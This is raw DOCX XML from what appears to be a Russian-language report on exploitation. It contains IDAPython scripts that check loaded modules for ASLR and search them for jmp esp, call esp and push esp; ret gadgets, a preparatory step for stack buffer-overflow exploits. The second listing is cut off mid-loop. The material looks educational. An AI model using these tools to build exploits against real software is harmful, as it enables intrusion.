          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"&lt;I"</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, e_lfanew_data)[</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="1750EB"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    pe = base + e_lfanew</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    pe_sig = ida_idd.dbg_read_memory(pe, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="1750EB"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">pe_sig != </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="8A822D"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b"PE</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="0037A6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\x00\x00</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="8A822D"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>continue</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">dllchars_data = ida_idd.dbg_read_memory(pe + </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="1750EB"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x5E</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="1750EB"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># PE Signature + IMAGE_FILE_HEADER + IMAGE_OPTIONAL_HEADER</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">if not </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">dllchars_data </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(dllchars_data) != </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="1750EB"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>continue</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dllchars = struct.unpack(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="067D17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"&lt;H"</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, dllchars_data)[</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="1750EB"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dllchars &amp; ASLR_FLAG:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="067D17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"%-40s 0x%08X ASLR ON" </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>% (name, base))</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="067D17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"%-40s 0x%08X ASLR OFF" </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>% (name, base))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F4172B" w14:textId="77777777" w:rsidR="00127358" w:rsidRDefault="00127358">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0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>
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D7F064" w14:textId="64D6889C" w:rsidR="00E02D80" w:rsidRDefault="00127358" w:rsidP="00127358">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1543B34C" w14:textId="1D9F79C9" w:rsidR="00127358" w:rsidRDefault="00127358" w:rsidP="00127358">
      <w:r>
        <w:t xml:space="preserve">Листинг </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDAPython</w:t>
      </w:r>
      <w:r>
        <w:t>-скрипта для поиска инструкций возврата на вершину стека</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58940450" w14:textId="77777777" w:rsidR="00127358" w:rsidRPr="00127358" w:rsidRDefault="00127358" w:rsidP="00127358">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ida_segment</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ida_bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>patterns = {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67D17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"jmp esp"</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="8A822D"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b"</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0037A6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\xFF\xE4</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="8A822D"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,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67D17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"call esp"</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="8A822D"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b"</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0037A6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\xFF\xD4</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="8A822D"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,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67D17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"push esp ; ret"</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="8A822D"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b"</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0037A6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\x54\xC3</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="8A822D"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="00627A"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>find_module_segments</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>):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0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">segs </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>= []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33B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>range</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(ida_segment.get_segm_qty()):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0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">seg </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>= ida_segment.getnseg(</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i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33B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">if not 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33B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>continue</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">seg_name </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>= ida_segment.get_segm_name(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33B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">if not </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>seg_name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33B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>continue</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        if </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>seg_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.lower().startswith(</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.lower()):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0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>segs</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.append(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33B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>segs</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="00627A"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>search_pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(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 xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pat_bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>):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0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">results </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>= []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0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">end </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">= 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.end_ea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0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">pat_len </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pat_bytes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0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ea </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">= 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.start_ea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33B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">while </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ea </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;= </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">end </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pat_len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0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">data </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>= ida_bytes.get_bytes(</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ea</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pat_len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33B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">data </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">== </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pat_bytes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0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>results</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.append(</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ea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0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ea </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">+= </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="1750EB"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="1750EB"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
